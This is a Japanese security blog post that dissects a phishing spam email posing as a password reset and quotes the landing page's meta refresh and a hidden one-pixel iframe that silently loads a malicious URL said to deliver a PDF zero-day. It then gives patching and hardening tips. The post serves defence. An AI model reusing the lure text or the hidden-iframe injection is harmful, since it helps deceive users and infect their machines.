FC2ブログ

【今日のウイルスメール】canadian pharmacy

以前のアンジェリーナ・ジョリーメールあたりから大量に来ている、canadian pharmacyスパムを装ったウイルス誘導メール。← 迷惑メールを装うって何だ!(爆)

大体HTMLメールで文面は様々だが、。リンクをクリックすると、適当なところに飛ばされる。
ちなみに今回は、
「Reset your メールのドメイン名 password」
本文
Reset your メールのドメイン名 password
Hello, メールアドレス.

We received your request to reset your メールのドメイン名 password. To confirm your request and reset your password, follow the instructions below. Confirming your request helps prevent unauthorized access to your account.
If you didn't request that your password be reset, please follow the instructions below to cancel your request.
CONFIRM REQUEST AND RESET PASSWORD
Click on the following web address:

で、クリックすると、たとえば h○○p://sonda.co.kr/index2.html に飛ばされる。

このindex2.htmlの内容は、以下のような感じ。


PLEASE, WAITING.... 4 sec
<meta http-equiv="refresh" content="4;url=h○○p://pullkeep.com" /> ↓ 通常の「canadian pharmacy」へ飛んでいく。
canadianpharmacy.jpg
↑ ちなみにIPの存在場所は中国。(aguseでの情報)
ip.jpg
↓問題はこれ。
<iframe src='h○○p://ads.compressyourmortgage.com:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>


多くの人は、いつも来ている「canadian pharmacy」としか思わないし、実際にクリックしても「canadian pharmacy」が表示されるので安心している。裏で本命iframeタグが動作して「:8080/index.php?pid=10」に飛ばされている。

「ジェペットさん=の中の人」に聞いてみると、ゼロデイのPDFが落ちてくるそうだ。でも、昨日アドビから修正リリースが出ているので、対策ちゃんとやっておこう!

アドビリーダを起動して、一番右の「ヘルプ」をクリックし「アップデートの有無をチェック」。
あとついでに、悪用されることも多いJavaScriptを無効化しておこう。「編集」メニューの一番下の「環境設定」をクリック。「javascript」をクリックし、右側の「Acrobat JavaScriptを使用(J)」のチェックを外しておこう

ちなみにジェペットおじさんは家に転がり込んできた松の木で「ピノッキオ」を作ったそうだ。なるほど!松の木から作られたピノッキが、鯨の中で、飲み込まれていたジェペットと会ったのは必然ということか。(笑)←一部受け

コメント


非公開コメント

プロフィール

どらいつ 家主:どらいつ

情報セキュリティ会社勤務。13年前からタバコを止めたが禁煙はしてない。ダイエットとリバウンドの繰り返し。


1958年 北九州市生まれ。大原小学校、池田小学校、香月中学、北九州予備校、東筑高校、熊本大学土木科(中退)、1984年就職、現在にいたる。

中学時は水泳部。部内で平泳ぎ 4位(4人中)。高校・大学時代9年間はラグビー。ポジションはフッカー。当時に今の体重があれば、、

ツイッター(Twitter) dry2
つぶやきログ(Twilog) dry2
日経電子版コラム
日経BP連載
グーグル+写真アルバム
フォト蔵 dry2

最新記事
最新コメント
カテゴリ
RSS
どらいつのお気に入り